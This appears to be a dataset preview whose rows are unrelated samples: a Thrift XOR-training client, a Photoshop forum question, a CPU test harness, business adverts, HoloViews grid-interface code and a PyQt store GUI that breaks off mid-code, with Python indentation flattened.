text
stringlengths 29
850k
|
|---|
from erlang_python import ErlangPythonServices
from helper import get_host, get_port
from os.path import basename
from thrift import Thrift
from thrift.protocol import TBinaryProtocol
from thrift.transport import TSocket
from thrift.transport import TTransport
class Dbg(object):
active = False
DEBUGGER = Dbg()
def main():
if DEBUGGER.active:
print("{} - main (): Start".format(basename(__file__)))
# --------------------------------------------------------------------------
# Read network parameters
# --------------------------------------------------------------------------
host = get_host()
port = get_port()
print(("{} - main (): This client will connect to a server with " +
"ip address {} and port number {}").format(basename(__file__), host, port))
# --------------------------------------------------------------------------
# Init thrift connection and protocol handlers
# --------------------------------------------------------------------------
# Make socket
socket = TSocket.TSocket(host, port)
# Buffering is critical. Raw sockets are very slow
transport = TTransport.TBufferedTransport(socket)
# Wrap in a protocol
protocol = TBinaryProtocol.TBinaryProtocol(transport)
# Create a client to use the protocol encoder
client = ErlangPythonServices.Client(protocol)
# Connect to server
transport.open()
# --------------------------------------------------------------------------
# XOR Training
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
# > annlink:create_neural_network(Conn, [2, 10, 1]).
# {ClientId,<<"A3zfatHw5jIZVsVaNYDKAemgg0qvQ+le">>}
# --------------------------------------------------------------------------
num_inputs = 2
num_outputs = 1
learning_rate = 0.001
model_id = client.initialize_model(num_inputs,
num_outputs,
learning_rate)
size = 10
client.add_layer(model_id,
size)
activation = "sigmoid"
client.add_activation(model_id,
activation)
size = 1
client.add_layer(model_id,
size)
# --------------------------------------------------------------------------
# > Inputs = [[0,0],[0,1],[1,0],[1,1]].
# [[0,0],[0,1],[1,0],[1,1]]
# > Labels = [[0],[1],[1],[0]].
# [[0],[1],[1],[0]]
# > annlink:add_data_chunk(Conn, ClientId, Inputs, Labels).
# ok
# --------------------------------------------------------------------------
inputs = [[0, 0], [0, 1], [1, 0], [1, 1]]
labels = [[0], [1], [1], [0]]
scale = []
client.add_data_chunk(model_id,
inputs,
labels,
scale)
# --------------------------------------------------------------------------
# > annlink:set_learning_rate(Conn, ClientId, 0.05).
# ok
# --------------------------------------------------------------------------
learning_rate = 0.05
client.set_learning_rate(model_id,
learning_rate)
# --------------------------------------------------------------------------
# > annlink:train(Conn).
# 0.14462602138519287
# --------------------------------------------------------------------------
epochs = 1
batch_size = 512
result = client.train(model_id,
epochs,
batch_size)
if DEBUGGER.active:
print("{} - model {} - main ({}): result from train".format(basename(__file__), model_id,
result))
# --------------------------------------------------------------------------
# >[annlink:train(Conn, ClientId, 200) || _ <- lists:seq(1,5)].
# which should produce something close to:
#
# [0.126319688744843,0.05803197836337134,
# 1.3663458995789856e-8,6.92154666914746e-17,
# 6.938893903907228e-18]
# --------------------------------------------------------------------------
epochs = 200
batch_size = 512
result = client.train(model_id,
epochs,
batch_size)
if DEBUGGER.active:
print("{} - model {} - main ({}): result from train".format(basename(__file__), model_id,
result))
result = client.train(model_id,
epochs,
batch_size)
if DEBUGGER.active:
print("{} - model {} - main ({}): result from train".format(basename(__file__), model_id,
result))
result = client.train(model_id,
epochs,
batch_size)
if DEBUGGER.active:
print("{} - model {} - main ({}): result from train".format(basename(__file__), model_id,
result))
result = client.train(model_id,
epochs,
batch_size)
if DEBUGGER.active:
print("{} - model {} - main ({}): result from train".format(basename(__file__), model_id,
result))
result = client.train(model_id,
epochs,
batch_size)
if DEBUGGER.active:
print("{} - model {} - main ({}): result from train".format(basename(__file__), model_id,
result))
# --------------------------------------------------------------------------
# >annlink:predict(Conn, ClientId, [[0,0], [0,1], [1,0], [1,1]]).
# [[0.0],[1.0],[1.0],[0.0]]
# --------------------------------------------------------------------------
data = [[0, 0], [0, 1], [1, 0], [1, 1]]
result = client.predict(model_id,
data)
if DEBUGGER.active:
print(
"{} - model {} - main ({}): result from predict".format(basename(__file__), model_id,
result))
client.terminate_model(model_id),
# --------------------------------------------------------------------------
# Terminate client
# --------------------------------------------------------------------------
# Close the connection
transport.close()
if DEBUGGER.active:
print("{} - main (): Done".format(basename(__file__)))
if __name__ == "__main__":
if DEBUGGER.active:
print("{} - __main__ (): Start".format(basename(__file__)))
try:
main()
if DEBUGGER.active:
print("{} - __main__ (): Done".format(basename(__file__)))
except Thrift.TException as tx:
print("{} - __main__ (): Exception: {}".format(basename(__file__), tx.message))
|
After using the liquify tool to change the size of eyes or mouth it leaves little ink spots all over the face. I am using cc 2019 on a mac.
Perhaps a screen-recording would help understand the issue better.
I have updated my computer to Mojave 10.14 and it is still showing the pixelated spots when i liquify areas. Please help.
|
#!/usr/bin/env python3
#
# Copyright 2011-2015 Jeff Bush
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Test load_sync/store_sync instructions.
This uses four threads to update variables round-robin.
"""
import os
import struct
import sys
sys.path.insert(0, '../..')
import test_harness
MEM_DUMP_FILE = os.path.join(test_harness.WORK_DIR, 'vmem.bin')
@test_harness.test(['verilator'])
def atomic(_, target):
hex_file = test_harness.build_program(['atomic.S'])
test_harness.run_program(
hex_file,
target,
dump_file=MEM_DUMP_FILE,
dump_base=0x100000,
dump_length=0x800,
flush_l2=True)
with open(MEM_DUMP_FILE, 'rb') as memfile:
for _ in range(512):
val = memfile.read(4)
if len(val) < 4:
raise test_harness.TestException('output file is truncated')
num_val, = struct.unpack('<L', val)
if num_val != 10:
raise test_harness.TestException(
'FAIL: mismatch: ' + str(num_val))
test_harness.execute_tests()
|
Leading PCB Manufacturer and Circuit Supplier in World’s Largest Selection of Electronic Circuit Board Components Canada and United States in INTERNATIONAL STANDARD. Synergise PCB Inc is a quick turn PCB Made like Double sided, multilayer and flexible printed circuit(FPC) in advanced production technology. For over 14+ years on time delivery quality Circuit Board Components supplier in local and Shipping .
|
from __future__ import absolute_import
import sys
import datetime as dt
from collections import OrderedDict, defaultdict, Iterable
try:
import itertools.izip as zip
except ImportError:
pass
import numpy as np
from .dictionary import DictInterface
from .interface import Interface, DataError
from ..dimension import dimension_name
from ..element import Element
from ..dimension import OrderedDict as cyODict
from ..ndmapping import NdMapping, item_check, sorted_context
from .. import util
from .interface import is_dask, dask_array_module, get_array_types
class GridInterface(DictInterface):
"""
Interface for simple dictionary-based dataset format using a
compressed representation that uses the cartesian product between
key dimensions. As with DictInterface, the dictionary keys correspond
to the column (i.e dimension) names and the values are NumPy arrays
representing the values in that column.
To use this compressed format, the key dimensions must be orthogonal
to one another with each key dimension specifying an axis of the
multidimensional space occupied by the value dimension data. For
instance, given an temperature recordings sampled regularly across
the earth surface, a list of N unique latitudes and M unique
longitudes can specify the position of NxM temperature samples.
"""
types = (dict, OrderedDict, cyODict)
datatype = 'grid'
gridded = True
@classmethod
def init(cls, eltype, data, kdims, vdims):
if kdims is None:
kdims = eltype.kdims
if vdims is None:
vdims = eltype.vdims
if not vdims:
raise ValueError('GridInterface interface requires at least '
'one value dimension.')
ndims = len(kdims)
dimensions = [dimension_name(d) for d in kdims+vdims]
if isinstance(data, tuple):
data = {d: v for d, v in zip(dimensions, data)}
elif isinstance(data, list) and data == []:
data = OrderedDict([(d, []) for d in dimensions])
elif not any(isinstance(data, tuple(t for t in interface.types if t is not None))
for interface in cls.interfaces.values()):
data = {k: v for k, v in zip(dimensions, zip(*data))}
elif isinstance(data, np.ndarray):
if data.ndim == 1:
if eltype._auto_indexable_1d and len(kdims)+len(vdims)>1:
data = np.column_stack([np.arange(len(data)), data])
else:
data = np.atleast_2d(data).T
data = {k: data[:,i] for i,k in enumerate(dimensions)}
elif isinstance(data, list) and data == []:
data = {d: np.array([]) for d in dimensions[:ndims]}
data.update({d: np.empty((0,) * ndims) for d in dimensions[ndims:]})
elif not isinstance(data, dict):
raise TypeError('GridInterface must be instantiated as a '
'dictionary or tuple')
for dim in kdims+vdims:
name = dimension_name(dim)
if name not in data:
raise ValueError("Values for dimension %s not found" % dim)
if not isinstance(data[name], get_array_types()):
data[name] = np.array(data[name])
kdim_names = [dimension_name(d) for d in kdims]
vdim_names = [dimension_name(d) for d in vdims]
expected = tuple([len(data[kd]) for kd in kdim_names])
irregular_shape = data[kdim_names[0]].shape if kdim_names else ()
valid_shape = irregular_shape if len(irregular_shape) > 1 else expected[::-1]
shapes = tuple([data[kd].shape for kd in kdim_names])
for vdim in vdim_names:
shape = data[vdim].shape
error = DataError if len(shape) > 1 else ValueError
if (not expected and shape == (1,)) or (len(set((shape,)+shapes)) == 1 and len(shape) > 1):
# If empty or an irregular mesh
pass
elif len(shape) != len(expected):
raise error('The shape of the %s value array does not '
'match the expected dimensionality indicated '
'by the key dimensions. Expected %d-D array, '
'found %d-D array.' % (vdim, len(expected), len(shape)))
elif any((s!=e and (s+1)!=e) for s, e in zip(shape, valid_shape)):
raise error('Key dimension values and value array %s '
'shapes do not match. Expected shape %s, '
'actual shape: %s' % (vdim, valid_shape, shape), cls)
return data, {'kdims':kdims, 'vdims':vdims}, {}
@classmethod
def concat(cls, datasets, dimensions, vdims):
from . import Dataset
with sorted_context(False):
datasets = NdMapping(datasets, kdims=dimensions)
datasets = datasets.clone([(k, v.data if isinstance(v, Dataset) else v)
for k, v in datasets.data.items()])
if len(datasets.kdims) > 1:
items = datasets.groupby(datasets.kdims[:-1]).data.items()
return cls.concat([(k, cls.concat(v, v.kdims, vdims=vdims)) for k, v in items],
datasets.kdims[:-1], vdims)
return cls.concat_dim(datasets, datasets.kdims[0], vdims)
@classmethod
def concat_dim(cls, datasets, dim, vdims):
values, grids = zip(*datasets.items())
new_data = {k: v for k, v in grids[0].items() if k not in vdims}
new_data[dim.name] = np.array(values)
for vdim in vdims:
arrays = [grid[vdim.name] for grid in grids]
shapes = set(arr.shape for arr in arrays)
if len(shapes) > 1:
raise DataError('When concatenating gridded data the shape '
'of arrays must match. %s found that arrays '
'along the %s dimension do not match.' %
(cls.__name__, vdim.name))
stack = dask_array_module().stack if any(is_dask(arr) for arr in arrays) else np.stack
new_data[vdim.name] = stack(arrays, -1)
return new_data
@classmethod
def irregular(cls, dataset, dim):
return dataset.data[dimension_name(dim)].ndim > 1
@classmethod
def isscalar(cls, dataset, dim):
values = cls.values(dataset, dim, expanded=False)
return values.shape in ((), (1,)) or len(np.unique(values)) == 1
@classmethod
def validate(cls, dataset, vdims=True):
Interface.validate(dataset, vdims)
@classmethod
def dimension_type(cls, dataset, dim):
if dim in dataset.dimensions():
arr = cls.values(dataset, dim, False, False)
else:
return None
return arr.dtype.type
@classmethod
def shape(cls, dataset, gridded=False):
shape = dataset.data[dataset.vdims[0].name].shape
if gridded:
return shape
else:
return (np.product(shape, dtype=np.intp), len(dataset.dimensions()))
@classmethod
def length(cls, dataset):
return cls.shape(dataset)[0]
@classmethod
def _infer_interval_breaks(cls, coord, axis=0):
"""
>>> GridInterface._infer_interval_breaks(np.arange(5))
array([-0.5, 0.5, 1.5, 2.5, 3.5, 4.5])
>>> GridInterface._infer_interval_breaks([[0, 1], [3, 4]], axis=1)
array([[-0.5, 0.5, 1.5],
[ 2.5, 3.5, 4.5]])
"""
coord = np.asarray(coord)
if sys.version_info.major == 2 and len(coord) and isinstance(coord[0], (dt.datetime, dt.date)):
# np.diff does not work on datetimes in python 2
coord = coord.astype('datetime64')
if len(coord) == 0:
return np.array([], dtype=coord.dtype)
deltas = 0.5 * np.diff(coord, axis=axis)
first = np.take(coord, [0], axis=axis) - np.take(deltas, [0], axis=axis)
last = np.take(coord, [-1], axis=axis) + np.take(deltas, [-1], axis=axis)
trim_last = tuple(slice(None, -1) if n == axis else slice(None)
for n in range(coord.ndim))
return np.concatenate([first, coord[trim_last] + deltas, last], axis=axis)
@classmethod
def coords(cls, dataset, dim, ordered=False, expanded=False, edges=False):
"""
Returns the coordinates along a dimension. Ordered ensures
coordinates are in ascending order and expanded creates
ND-array matching the dimensionality of the dataset.
"""
dim = dataset.get_dimension(dim, strict=True)
irregular = cls.irregular(dataset, dim)
if irregular or expanded:
if irregular:
data = dataset.data[dim.name]
else:
data = util.expand_grid_coords(dataset, dim)
if edges and data.shape == dataset.data[dataset.vdims[0].name].shape:
data = cls._infer_interval_breaks(data, axis=1)
data = cls._infer_interval_breaks(data, axis=0)
return data
data = dataset.data[dim.name]
if ordered and np.all(data[1:] < data[:-1]):
data = data[::-1]
shape = cls.shape(dataset, True)
if dim in dataset.kdims:
idx = dataset.get_dimension_index(dim)
isedges = (dim in dataset.kdims and len(shape) == dataset.ndims
and len(data) == (shape[dataset.ndims-idx-1]+1))
else:
isedges = False
if edges and not isedges:
data = cls._infer_interval_breaks(data)
elif not edges and isedges:
data = data[:-1] + np.diff(data)/2.
return data
@classmethod
def canonicalize(cls, dataset, data, data_coords=None, virtual_coords=[]):
"""
Canonicalize takes an array of values as input and reorients
and transposes it to match the canonical format expected by
plotting functions. In certain cases the dimensions defined
via the kdims of an Element may not match the dimensions of
the underlying data. A set of data_coords may be passed in to
define the dimensionality of the data, which can then be used
to np.squeeze the data to remove any constant dimensions. If
the data is also irregular, i.e. contains multi-dimensional
coordinates, a set of virtual_coords can be supplied, required
by some interfaces (e.g. xarray) to index irregular datasets
with a virtual integer index. This ensures these coordinates
are not simply dropped.
"""
if data_coords is None:
data_coords = dataset.dimensions('key', label='name')[::-1]
# Transpose data
dims = [name for name in data_coords
if isinstance(cls.coords(dataset, name), get_array_types())]
dropped = [dims.index(d) for d in dims
if d not in dataset.kdims+virtual_coords]
if dropped:
data = np.squeeze(data, axis=tuple(dropped))
if not any(cls.irregular(dataset, d) for d in dataset.kdims):
inds = [dims.index(kd.name) for kd in dataset.kdims]
inds = [i - sum([1 for d in dropped if i>=d]) for i in inds]
if inds:
data = data.transpose(inds[::-1])
# Reorient data
invert = False
slices = []
for d in dataset.kdims[::-1]:
coords = cls.coords(dataset, d)
if np.all(coords[1:] < coords[:-1]) and not coords.ndim > 1:
slices.append(slice(None, None, -1))
invert = True
else:
slices.append(slice(None))
data = data[tuple(slices)] if invert else data
# Allow lower dimensional views into data
if len(dataset.kdims) < 2:
data = data.flatten()
return data
@classmethod
def invert_index(cls, index, length):
if np.isscalar(index):
return length - index
elif isinstance(index, slice):
start, stop = index.start, index.stop
new_start, new_stop = None, None
if start is not None:
new_stop = length - start
if stop is not None:
new_start = length - stop
return slice(new_start-1, new_stop-1)
elif isinstance(index, Iterable):
new_index = []
for ind in index:
new_index.append(length-ind)
return new_index
@classmethod
def ndloc(cls, dataset, indices):
selected = {}
adjusted_inds = []
all_scalar = True
for i, (kd, ind) in enumerate(zip(dataset.kdims[::-1], indices)):
coords = cls.coords(dataset, kd.name, True)
if np.isscalar(ind):
ind = [ind]
else:
all_scalar = False
selected[kd.name] = coords[ind]
adjusted_inds.append(ind)
for kd in dataset.kdims:
if kd.name not in selected:
coords = cls.coords(dataset, kd.name)
selected[kd.name] = coords
all_scalar = False
for d in dataset.dimensions():
if d in dataset.kdims and not cls.irregular(dataset, d):
continue
arr = cls.values(dataset, d, flat=False, compute=False)
if all_scalar and len(dataset.vdims) == 1:
return arr[tuple(ind[0] for ind in adjusted_inds)]
selected[d.name] = arr[tuple(adjusted_inds)]
return tuple(selected[d.name] for d in dataset.dimensions())
@classmethod
def values(cls, dataset, dim, expanded=True, flat=True, compute=True):
dim = dataset.get_dimension(dim, strict=True)
if dim in dataset.vdims or dataset.data[dim.name].ndim > 1:
data = dataset.data[dim.name]
data = cls.canonicalize(dataset, data)
da = dask_array_module()
if compute and da and isinstance(data, da.Array):
data = data.compute()
return data.T.flatten() if flat else data
elif expanded:
data = cls.coords(dataset, dim.name, expanded=True)
return data.T.flatten() if flat else data
else:
return cls.coords(dataset, dim.name, ordered=True)
@classmethod
def groupby(cls, dataset, dim_names, container_type, group_type, **kwargs):
# Get dimensions information
dimensions = [dataset.get_dimension(d, strict=True) for d in dim_names]
if 'kdims' in kwargs:
kdims = kwargs['kdims']
else:
kdims = [kdim for kdim in dataset.kdims if kdim not in dimensions]
kwargs['kdims'] = kdims
invalid = [d for d in dimensions if dataset.data[d.name].ndim > 1]
if invalid:
if len(invalid) == 1: invalid = "'%s'" % invalid[0]
raise ValueError("Cannot groupby irregularly sampled dimension(s) %s."
% invalid)
# Update the kwargs appropriately for Element group types
group_kwargs = {}
group_type = dict if group_type == 'raw' else group_type
if issubclass(group_type, Element):
group_kwargs.update(util.get_param_values(dataset))
else:
kwargs.pop('kdims')
group_kwargs.update(kwargs)
drop_dim = any(d not in group_kwargs['kdims'] for d in kdims)
# Find all the keys along supplied dimensions
keys = [cls.coords(dataset, d.name) for d in dimensions]
transpose = [dataset.ndims-dataset.kdims.index(kd)-1 for kd in kdims]
transpose += [i for i in range(dataset.ndims) if i not in transpose]
# Iterate over the unique entries applying selection masks
grouped_data = []
for unique_key in zip(*util.cartesian_product(keys)):
select = dict(zip(dim_names, unique_key))
if drop_dim:
group_data = dataset.select(**select)
group_data = group_data if np.isscalar(group_data) else group_data.columns()
else:
group_data = cls.select(dataset, **select)
if np.isscalar(group_data) or (isinstance(group_data, get_array_types()) and group_data.shape == ()):
group_data = {dataset.vdims[0].name: np.atleast_1d(group_data)}
for dim, v in zip(dim_names, unique_key):
group_data[dim] = np.atleast_1d(v)
elif not drop_dim:
if isinstance(group_data, get_array_types()):
group_data = {dataset.vdims[0].name: group_data}
for vdim in dataset.vdims:
data = group_data[vdim.name]
data = data.transpose(transpose[::-1])
group_data[vdim.name] = np.squeeze(data)
group_data = group_type(group_data, **group_kwargs)
grouped_data.append((tuple(unique_key), group_data))
if issubclass(container_type, NdMapping):
with item_check(False):
return container_type(grouped_data, kdims=dimensions)
else:
return container_type(grouped_data)
@classmethod
def key_select_mask(cls, dataset, values, ind):
if isinstance(ind, tuple):
ind = slice(*ind)
if isinstance(ind, get_array_types()):
mask = ind
elif isinstance(ind, slice):
mask = True
if ind.start is not None:
mask &= ind.start <= values
if ind.stop is not None:
mask &= values < ind.stop
# Expand empty mask
if mask is True:
mask = np.ones(values.shape, dtype=np.bool)
elif isinstance(ind, (set, list)):
iter_slcs = []
for ik in ind:
iter_slcs.append(values == ik)
mask = np.logical_or.reduce(iter_slcs)
elif callable(ind):
mask = ind(values)
elif ind is None:
mask = None
else:
index_mask = values == ind
if (dataset.ndims == 1 or dataset._binned) and np.sum(index_mask) == 0:
data_index = np.argmin(np.abs(values - ind))
mask = np.zeros(len(values), dtype=np.bool)
mask[data_index] = True
else:
mask = index_mask
if mask is None:
mask = np.ones(values.shape, dtype=bool)
return mask
@classmethod
def select(cls, dataset, selection_mask=None, **selection):
dimensions = dataset.kdims
val_dims = [vdim for vdim in dataset.vdims if vdim in selection]
if val_dims:
raise IndexError('Cannot slice value dimensions in compressed format, '
'convert to expanded format before slicing.')
indexed = cls.indexed(dataset, selection)
full_selection = [(d, selection.get(d.name, selection.get(d.label)))
for d in dimensions]
data = {}
value_select = []
for i, (dim, ind) in enumerate(full_selection):
irregular = cls.irregular(dataset, dim)
values = cls.coords(dataset, dim, irregular)
mask = cls.key_select_mask(dataset, values, ind)
if irregular:
if np.isscalar(ind) or isinstance(ind, (set, list)):
raise IndexError("Indexing not supported for irregularly "
"sampled data. %s value along %s dimension."
"must be a slice or 2D boolean mask."
% (ind, dim))
mask = mask.max(axis=i)
elif dataset._binned:
edges = cls.coords(dataset, dim, False, edges=True)
inds = np.argwhere(mask)
if np.isscalar(ind):
emin, emax = edges.min(), edges.max()
if ind < emin:
raise IndexError("Index %s less than lower bound "
"of %s for %s dimension." % (ind, emin, dim))
elif ind >= emax:
raise IndexError("Index %s more than or equal to upper bound "
"of %s for %s dimension." % (ind, emax, dim))
idx = max([np.digitize([ind], edges)[0]-1, 0])
mask = np.zeros(len(values), dtype=np.bool)
mask[idx] = True
values = edges[idx:idx+2]
elif len(inds):
values = edges[inds.min(): inds.max()+2]
else:
values = edges[0:0]
else:
values = values[mask]
values, mask = np.asarray(values), np.asarray(mask)
value_select.append(mask)
data[dim.name] = np.array([values]) if np.isscalar(values) else values
int_inds = [np.argwhere(v) for v in value_select][::-1]
index = np.ix_(*[np.atleast_1d(np.squeeze(ind)) if ind.ndim > 1 else np.atleast_1d(ind)
for ind in int_inds])
for kdim in dataset.kdims:
if cls.irregular(dataset, dim):
da = dask_array_module()
if da and isinstance(dataset.data[kdim.name], da.Array):
data[kdim.name] = dataset.data[kdim.name].vindex[index]
else:
data[kdim.name] = np.asarray(data[kdim.name])[index]
for vdim in dataset.vdims:
da = dask_array_module()
if da and isinstance(dataset.data[vdim.name], da.Array):
data[vdim.name] = dataset.data[vdim.name].vindex[index]
else:
data[vdim.name] = np.asarray(dataset.data[vdim.name])[index]
if indexed:
if len(dataset.vdims) == 1:
da = dask_array_module()
arr = np.squeeze(data[dataset.vdims[0].name])
if da and isinstance(arr, da.Array):
arr = arr.compute()
return arr if np.isscalar(arr) else arr[()]
else:
return np.array([np.squeeze(data[vd.name])
for vd in dataset.vdims])
return data
@classmethod
def sample(cls, dataset, samples=[]):
"""
Samples the gridded data into dataset of samples.
"""
ndims = dataset.ndims
dimensions = dataset.dimensions(label='name')
arrays = [dataset.data[vdim.name] for vdim in dataset.vdims]
data = defaultdict(list)
for sample in samples:
if np.isscalar(sample): sample = [sample]
if len(sample) != ndims:
sample = [sample[i] if i < len(sample) else None
for i in range(ndims)]
sampled, int_inds = [], []
for d, ind in zip(dimensions, sample):
cdata = dataset.data[d]
mask = cls.key_select_mask(dataset, cdata, ind)
inds = np.arange(len(cdata)) if mask is None else np.argwhere(mask)
int_inds.append(inds)
sampled.append(cdata[mask])
for d, arr in zip(dimensions, np.meshgrid(*sampled)):
data[d].append(arr)
for vdim, array in zip(dataset.vdims, arrays):
da = dask_array_module()
flat_index = np.ravel_multi_index(tuple(int_inds)[::-1], array.shape)
if da and isinstance(array, da.Array):
data[vdim.name].append(array.flatten().vindex[tuple(flat_index)])
else:
data[vdim.name].append(array.flat[flat_index])
concatenated = {d: np.concatenate(arrays).flatten() for d, arrays in data.items()}
return concatenated
@classmethod
def aggregate(cls, dataset, kdims, function, **kwargs):
kdims = [dimension_name(kd) for kd in kdims]
data = {kdim: dataset.data[kdim] for kdim in kdims}
axes = tuple(dataset.ndims-dataset.get_dimension_index(kdim)-1
for kdim in dataset.kdims if kdim not in kdims)
da = dask_array_module()
dropped = []
for vdim in dataset.vdims:
values = dataset.data[vdim.name]
atleast_1d = da.atleast_1d if is_dask(values) else np.atleast_1d
try:
data[vdim.name] = atleast_1d(function(values, axis=axes, **kwargs))
except TypeError:
dropped.append(vdim)
return data, dropped
@classmethod
def reindex(cls, dataset, kdims, vdims):
dropped_kdims = [kd for kd in dataset.kdims if kd not in kdims]
dropped_vdims = ([vdim for vdim in dataset.vdims
if vdim not in vdims] if vdims else [])
constant = {}
for kd in dropped_kdims:
vals = cls.values(dataset, kd.name, expanded=False)
if len(vals) == 1:
constant[kd.name] = vals[0]
data = {k: values for k, values in dataset.data.items()
if k not in dropped_kdims+dropped_vdims}
if len(constant) == len(dropped_kdims):
joined_dims = kdims+dropped_kdims
axes = tuple(dataset.ndims-dataset.kdims.index(d)-1
for d in joined_dims)
dropped_axes = tuple(dataset.ndims-joined_dims.index(d)-1
for d in dropped_kdims)
for vdim in vdims:
vdata = data[vdim.name]
if len(axes) > 1:
vdata = vdata.transpose(axes[::-1])
if dropped_axes:
vdata = np.squeeze(vdata, axis=dropped_axes)
data[vdim.name] = vdata
return data
elif dropped_kdims:
return tuple(dataset.columns(kdims+vdims).values())
return data
@classmethod
def add_dimension(cls, dataset, dimension, dim_pos, values, vdim):
if not vdim:
raise Exception("Cannot add key dimension to a dense representation.")
dim = dimension_name(dimension)
return dict(dataset.data, **{dim: values})
@classmethod
def sort(cls, dataset, by=[], reverse=False):
if not by or by in [dataset.kdims, dataset.dimensions()]:
return dataset.data
else:
raise Exception('Compressed format cannot be sorted, either instantiate '
'in the desired order or use the expanded format.')
@classmethod
def iloc(cls, dataset, index):
rows, cols = index
scalar = False
if np.isscalar(cols):
scalar = np.isscalar(rows)
cols = [dataset.get_dimension(cols, strict=True)]
elif isinstance(cols, slice):
cols = dataset.dimensions()[cols]
else:
cols = [dataset.get_dimension(d, strict=True) for d in cols]
if np.isscalar(rows):
rows = [rows]
new_data = []
for d in cols:
new_data.append(cls.values(dataset, d, compute=False)[rows])
if scalar:
da = dask_array_module()
if new_data and (da and isinstance(new_data[0], da.Array)):
return new_data[0].compute()[0]
return new_data[0][0]
return tuple(new_data)
@classmethod
def range(cls, dataset, dimension):
if dataset._binned and dimension in dataset.kdims:
expanded = cls.irregular(dataset, dimension)
column = cls.coords(dataset, dimension, expanded=expanded, edges=True)
else:
column = cls.values(dataset, dimension, expanded=False, flat=False)
da = dask_array_module()
if column.dtype.kind == 'M':
dmin, dmax = column.min(), column.max()
if da and isinstance(column, da.Array):
return da.compute(dmin, dmax)
return dmin, dmax
elif len(column) == 0:
return np.NaN, np.NaN
else:
try:
dmin, dmax = (np.nanmin(column), np.nanmax(column))
if da and isinstance(column, da.Array):
return da.compute(dmin, dmax)
return dmin, dmax
except TypeError:
column.sort()
return column[0], column[-1]
Interface.register(GridInterface)
|
We’re one of the top hotels near Ohio State University (the nation’s second largest college campus).
Shop at the premier stores at Columbus's shopping mecca, the nearby Polaris Fashion Place.
Visit exotic and familiar animals and sea-life at the nationally-renowned Columbus Zoo & Aquarium.
A chic & complete mall, with names like Saks Fifth Avenue & Kaufmann's. 50 specialty shops & dining.
Enjoy the best in film entertainment, located in Crosswoods Center.
Go-Karts, Miniature Golf, Laser Tag, Bumper Boats and so much more!
Spend the day at this fascinating zoo or cool off in the water park.
|
# -*- coding: utf-8 -*-
#
# Created: Fri Nov 13 14:07:26 2015
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
import hashlib
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
##
# StoreTab2
# This class is the GUI for a user's store.
class storeTab2(QtGui.QWidget):
##
# Constructor
# Creates a users store for viewing.
# @param store: holds store data representation
def __init__(self, merchant_representation):
super(storeTab2, self).__init__()
self.setObjectName(_fromUtf8("Form"))
self.resize(1038, 686)
self.label_11 = QtGui.QLabel(self)
self.label_11.setGeometry(QtCore.QRect(540, 6, 231, 211))
self.label_11.setText(_fromUtf8(""))
self.label_11.setObjectName(_fromUtf8("label_11"))
self.label_12 = QtGui.QLabel(self)
self.label_12.setGeometry(QtCore.QRect(0, 460, 111, 17))
self.label_12.setObjectName(_fromUtf8("label_12"))
##
# Set up table of user contracts and headers
self.contractTable = QtGui.QTableWidget(self)
self.contractTable.setGeometry(QtCore.QRect(0, 480, 1031, 201))
self.contractTable.setObjectName(_fromUtf8("contractTable"))
self.contractTable.setColumnCount(4)
item = QtGui.QTableWidgetItem()
item.setText("Item Name")
self.contractTable.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
item.setText("Price")
self.contractTable.setHorizontalHeaderItem(1, item)
item = QtGui.QTableWidgetItem()
item.setText("Expiry")
self.contractTable.setHorizontalHeaderItem(2, item)
item = QtGui.QTableWidgetItem()
item.setText("Description")
self.contractTable.setHorizontalHeaderItem(3, item)
self.contractTable.itemClicked.connect(self.contract_clicked)
##
# Add listings to table of contracts
for count, listing in enumerate(merchant_representation.get_listings()):
trade_info = listing.get_module('trade')
metadata = listing.get_module('metadata')
##
# Set row label to contract hash
self.contractTable.setRowCount(count + 1)
item = QtGui.QTableWidgetItem()
item.setText(str(listing.contract_hash()))
item.setData(QtCore.Qt.UserRole, listing)
self.contractTable.setVerticalHeaderItem(count, item)
item = QtGui.QTableWidgetItem()
item.setText(trade_info['name'])
item.setData(QtCore.Qt.UserRole, listing)
self.contractTable.setItem(count, 0, item)
item = QtGui.QTableWidgetItem()
item.setText(trade_info['price'])
item.setData(QtCore.Qt.UserRole, listing)
self.contractTable.setItem(count, 1, item)
item = QtGui.QTableWidgetItem()
item.setText(metadata['expiry'])
item.setData(QtCore.Qt.UserRole, listing)
self.contractTable.setItem(count, 2, item)
item = QtGui.QTableWidgetItem()
item.setText(trade_info['description'])
item.setData(QtCore.Qt.UserRole, listing)
self.contractTable.setItem(count, 3, item)
self.gridLayoutWidget = QtGui.QWidget(self)
self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 10, 771, 406))
self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.publicKey = QtGui.QTextEdit(self.gridLayoutWidget)
self.publicKey.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.publicKey.setObjectName(_fromUtf8("publicKey"))
self.gridLayout.addWidget(self.publicKey, 3, 1, 1, 1)
self.GUID = QtGui.QTextEdit(self.gridLayoutWidget)
self.GUID.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.GUID.setObjectName(_fromUtf8("GUID"))
self.gridLayout.addWidget(self.GUID, 2, 1, 1, 1)
self.label_4 = QtGui.QLabel(self.gridLayoutWidget)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1)
self.storeEmail = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(18)
